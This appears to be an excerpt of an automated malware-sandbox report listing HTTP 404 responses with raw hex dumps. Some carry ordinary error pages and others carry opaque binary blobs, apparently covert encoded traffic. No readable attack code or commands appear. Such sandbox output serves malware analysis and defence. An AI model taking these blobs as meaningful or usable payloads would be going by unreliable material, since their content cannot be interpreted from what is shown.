71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1McjKsnOP64XZW%2FaK815GI%2Bd7iETRdqkCVB5Hc7fmNJFIJBfIUOSjBrdAAjlWHxzdqFCh9wcTXNyOo5wji4vfzA7b0kyOZNiwfilmJoT%2FmJDm76lVaKIILIbtiLQZzbeMQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979caa3c17775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 38 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 f7 75 3a 52 9e 1a d9 1a d7 ff 17 a2 2e f6 2d 42 17 34 ff 6b 4b 62 85 54 2c 18 36 c1 a8 cb ac d7 75 95 37 79 16 35 ff b7 0d 0a Data Ascii: 38Uys/~(u:R.-B4kKbT,6u7y5
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pq6Btvyo1ee%2BHZETKf8WUAyPyn3f0kfeSa25s7qlehqQY5ud70qgbDxt5f8vSvUS4CTLOAaSAZKXEq129Ummib8XDsf2bQhw0PrT8nq4eG0U3OIKP5lP3H%2BR5%2BFh6hwWLA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979cc56b28775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rz2LTai8UoAyqlyruCRtQGdY9up19CNKLF5S5NFKHRugOi5WsKByxB8qrkS25bTNNXVFtqpsyq%2B6Ms%2BXZKAOvKyj4BmcoCmjetzdqjsJqeJKWkJ76T%2FdwICajcKGKaAgkg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979cc69d9a775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 37 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 f7 75 3a 52 85 14 dd 51 d5 ff 13 b1 67 f2 25 48 16 22 e0 6a 0b 65 88 17 0a 03 6b de a0 81 8f d0 30 d1 76 64 5d 28 e2 0d 0a Data Ascii: 37Uys/~(u:RQg%H"jek0vd](
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7Lie5HcEy528iAEIfjSq7UEkR1uOq33iV1dhBmypT4oeG%2FuFqleVSPjN%2Bwnz1VEfiiKr4aFCqQcXTVfu5Zv7dbQzLTg0HCdEAlEmkPcWAzmT80M1JjrnZ%2Fo4owooz2mNgw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979cd1d8930716-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=U1UwcdvmLUwlRPNHiN5fkoiihnZR1cj%2F7WRWSEGdZd3stWfUmXPyskjQw1nc1FCqVovKunECdL7lRkqLk%2FDniPvc%2FAHs3NHJPI7A7Zh28sZoJpJj%2F8UGRCPl6XJmg8NNJg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979cd36a780716-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 38 33 30 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 f3 dd 04 1a ea 42 12 73 46 12 e9 bf 9a 81 35 7c 01 13 96 5d 50 bf d8 75 92 a7 0a fe 30 71 33 bc a3 7c f7 ca 3e 59 57 cb c6 68 c5 b3 3b 73 51 71 64 64 b8 f0 ff 20 3d a7 58 93 e0 52 bb f8 db cc 63 48 c7 29 a0 b0 4d da 16 85 c5 d4 90 13 19 5f bf 6c 13 d9 7b 64 58 c5 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e cf 00 ec 4d 1a 77 d7 07 53 53 fa cb 1f 9e fd 09 50 2a ee 8c 8a 7b 7e c1 f6 ff 78 b3 56 db c4 0d 13 13 0f 68 e1 92 24 18 4f c5 03 01 ca a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 ea f1 96 be 21 51 61 f7 ec 3b 7c 8a 28 c8 c8 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d 0b 7a e5 0e f4 eb 7e 71 eb a0 f6 1a e0 30 4b d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 eb 2e b9 5a e0 cc 23 92 67 0e 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f ab 9d cc 46 99 48 15 ac af eb d9 55 3d af ba 68 92 1e ff 9d a7 7e 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 23 e9 de 8e 82 11 e8 e4 1f da a0 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 19 70 9a a2 ce 57 a3 94 6f 84 1f d4 fc 69 91 9c 65 07 f1 2c d6 af 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 4a e3 96 0c 06 1a 50 6d 43 44 12 8a 8b e1 42 79 d7 9c 24 c2 e0 2b 7d b6 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 e3 a2 bc 5b 6f e3 e3 1c 13 3d f5 52 48 14 3e 96 4d d5 e7 17 3f 5c e1 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 6c 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 Data Ascii: 3830`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*BsF5|]Pu0q3|>YWh;sQqdd =XRcH)M_l{dX3Ob>!ZC:>MwSSP*{~xVh$Oa~i~]DzN,!Qa;|(kJk?a]
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dN2KNRRLRekgNeV4b%2Fz2Ol93bzi0ht6P1F9WvwLx3MpxFevNfnauDQCn%2BXcJyYgAuEXqt%2B9GmAb8ExwUiahlOYCPkualScJb7jQTwfJEhe4RKMW3zctEqwK1rr4XIz5yZA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979cdabba30716-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sw1wBG91n04tfI1nMl23%2F9SZD5BlckR0tZCJhq8kf0DDiVe%2FUx%2BPeveymWMF9BbvWRMEMbkRUmTQwx74w5ZTMofAkc03YjNzBSB4YMZNkqn3WXuzLF24qHKyKOQ3U8ePPg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979cdc6dd40716-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 34 33 39 33 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 9d 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8b bf 6a c6 e2 82 15 fc 28 6a ac 53 f6 c7 35 f3 73 07 03 d2 ef f9 fb fa eb b1 87 6a cd 31 3d 33 d1 b2 77 45 7c 1f 57 44 7d 42 f7 3c 50 25 51 fe 08 22 b9 3f 19 66 3d 28 2a 97 6a dd d6 bc db 43 17 5c 53 a6 cd f6 4d 55 62 91 54 5b fd 55 19 d0 ed f5 10 b1 17 26 58 4a 33 4f 62 3e 17 21 2b da a3 06 83 3a 56 3f cb 00 23 ae 42 15 d7 07 53 53 fa cb 0f 9e 1d 09 52 2b e5 9d 83 7b 7e 45 f7 ff 78 8d 55 db d4 0d 13 13 bf 1e e1 92 24 08 4f c5 1b cf e7 a1 c1 7e de f5 69 b9 19 17 7e 5f af 9a 95 18 a9 a0 ed 31 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 55 a0 1a bf 76 34 fd f8 12 37 53 6c 19 7d 0a 8d c7 fd e4 0e a4 eb 7e 71 eb f0 b3 1a b8 9b 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 9c 01 6b 49 0d 92 90 f7 83 f0 e2 e7 72 3b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 f9 48 15 cc 81 99 bd 34 49 ce ba 68 50 9e fc 9d 7f 5f 5b 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 b1 8a 64 f1 33 54 73 25 ed 70 17 4b 65 f2 df 8e 82 c1 f9 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 5e 54 ab de 08 0d 75 8f b7 af 57 a3 68 99 85 1f d4 3c 7a 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 ca 92 b6 3b 35 2d 11 6d 43 58 b9 8b 8b e1 92 68 d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 e3 a6 b4 47 30 80 e3 1c e1 7f e3 52 48 c4 29 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca e2 cf 25 4e b1 e0 a3 9c 04 98 c3 a7 51 2c fd d4 5f 49 6a 43 9c d3 34 62 18 3e 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d Data Ascii: 4393`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*j(jS5sj1=3wE|WD}B<P%Q"?f=(*jC\SMUbT[U&XJ3Ob>!+:V?#BSSR+{~ExU$O~i~_1zN,%Qa>|(HkJ{/a
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Tp5mXNxwR9fmWtX%2Fdi2xhdLiXe46SJbmILKqD4at0aDTutWJPqK2MxsMmSeF8K8kIjhGO9GdPUygYHNsCTs45dLqhesSCIbpH4AL3%2FbjHZXY%2BxWWP9Jobi%2FU4dYUgifOSw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979cf02da80716-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=96YZWi58%2Fxd0XPFczlcj7a48R%2F0pQmV73bKEREgezNFj1cKCnQeUHLRDzs5clkOyUj1xsUCGsxZanaSrYtBsUarjjoqE9C%2BexUsMgXPAjc5Gll5X7bGIRVJebaN0ffGxAQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979cf1afc40716-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:59 GMTServer: Apache/2.4.41 (Ubuntu)Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 32 37 35 32 32 0d 0a 53 00 00 00 8f 3b 45 30 46 2c cf 60 b9 6a 5a 56 fd aa f0 00 44 2e f9 96 b4 f0 a5 47 03 af d5 2e f1 b0 70 50 db a4 94 f0 31 a2 da 8c a0 37 bd 47 9a a0 1b 43 cd 66 5d 8b 58 3b b5 cc d7 06 9a e2 13 8c 8d 91 f8 2b a4 1e 31 f3 d8 ca f9 e4 dd 3b f9 1c 88 21 b0 c2 f0 00 ca 74 02 00 1c ac 2b da 00 0b 07 00 09 00 34 00 00 01 54 b5 a6 04 fa 19 13 50 fe ad bf fe 50 01 0b 00 6b 6d 9b a1 be 47 6b 95 bb 2f 20 d4 c8 8f 3e f9 48 d9 5d 6d 65 6d 75 16 dc 93 04 9a 4e 3d 6e 00 a7 fb c4 e6 ba 10 81 4e de c9 81 63 bd 6b c1 21 12 08 03 82 92 b9 66 33 2c c4 d8 a4 26 81 d2 23 e6 f5 f0 39 01 b1 f6 c3 ff ed 03 02 bb a2 cb aa 25 f7 50 36 a5 43 cb 97 a8 89 2f 73 18 41 7c 38 c8 25 6c e3 2a 3c 5c 31 22 93 fa eb 08 47 0a cb 81 c7 f6 64 05 28 c2 6a 21 d2 ce 9f ad 76 7d 4a 1a d8 92 2f 8c 78 c6 24 f2 d6 cf 6b fb c5 e7 05 b0 1f 95 8d a2 26 fc ad 77 7d 1f 5b 65 2f 3f 20 47 56 ae f1 94 d8 e8 af 02 9c 35 87 be c3 a6 6b 91 75 5d 48 ac 3a 7e a2 d9 1c ad 62 4f e2 8d fa e3 a9 4d d6 02 65 2c a5 97 c6 61 03 59 fc 1d d4 88 16 72 64 45 ef 71 50 7d 98 6f 6e 3b 4c 4a 24 46 46 d2 e5 01 0f 29 c5 77 b5 91 d2 cf 70 47 4e 70 90 b9 1a e8 a3 c8 f4 35 b3 7d 94 47 eb 9e 1c 83 1b 9f 2b 04 01 20 1b 5d 82 c5 96 4e c0 54 3b 64 88 1b 82 ad a0 f7 12 e2 23 b3 67 bd 67 b8 6c d5 2e df 89 bb 99 b8 f8 a8 37 72 14 26 37 4c 36 33 93 ea 14 9f fc 79 88 6c 52 f9 4b a8 4b 79 72 fe 17 4a 97 56 fc 2c 49 19 fe ac 9b 63 57 59 57 b2 6d 42 86 48 71 26 85 c8 e9 46 b3 be 7d 6e 49 77 a0 bc d7 28 3b 4d 72 ba 0f 96 20 d8 e2 f0 06 2a 13 f4 31 f3 75 9d 49 ed a3 a9 16 2a be 8b 64 65 69 55 b5 88 be 3d 47 b3 fd d6 b1 69 98 52 de 77 cb ee 26 12 15 57 48 43 74 87 cc a7 87 b5 da 57 bd 62 db 5b 02 16 5b 43 da 83 e9 7d eb 69 ba cb 94 e0 d3 9c 36 d6 e8 5e 61 b8 d3 7c 0b 4f 5f d4 5f 20 84 6f 29 33 35 f8 06 1c 4b 74 4f 8b c3 37 09 e9 f0 3f 99 f4 29 aa d7 6c e4 9b 7d 8d 35 38 05 d8 ed 28 87 b4 7c 23 20 1a 4c 17 4f d3 f2 78 47 99 4d 46 4c ff 34 b5 cf ce 58 f4 58 6b ff 58 95 63 70 fe 45 7b 44 6a 9d 01 70 a4 96 d5 37 e9 53 35 1c ec 0d 77 3d 02 33 8a 5d 4f 02 f9 f2 29 23 5a ba c1 49 cd e4 b9 8f de 25 c8 51 82 ca ba 10 3a 0d e9 c9 3c 79 23 63 02 10 48 3f 91 d7 9d ee 95 29 de 70 a0 eb 9f 55 33 e8 17 3e 67 82 d3 5f 4a b1 d1 1c b2 35 6f e1 d4 36 68 1c b3 19 84 3c 49 ae 3a bf 98 c3 68 29 98 be f9 8d 66 0e 59 d3 88 1d a4 ea 06 bc 7f ab de 5a 8a 42 d8 ab 4a ed 7b 02 99 5f 31 df c6 ae 1b 3c a7 00 1c 42 02 01 1b 9b b8 5a 93 aa ba 49 d3 17 c5 0a f3 97 e0 63 f3 d1 e5 b9 41 bb 2a 06 24 ad af b9 25 17 3b f1 9b 84 1e ce 34 9c 3a 66 91 81 a2 ef 69 19 74 61 e8 33 37 39 af ed b1 65 c2 c3 f9 b0 fa f4 1c 64 c9 43 62 b0 fb e1 82 2e 1e ff a9 5b 8f 2c 06 1c 99 47 12 ba b9 cb de a6 fb 99 d6 48 4c ef 17 cd 38 c0 b1 f7 5c 4d 17 a5 55 86 f6 0f 6e 91 4f 16 df 22 08 2a 6e 37 d0 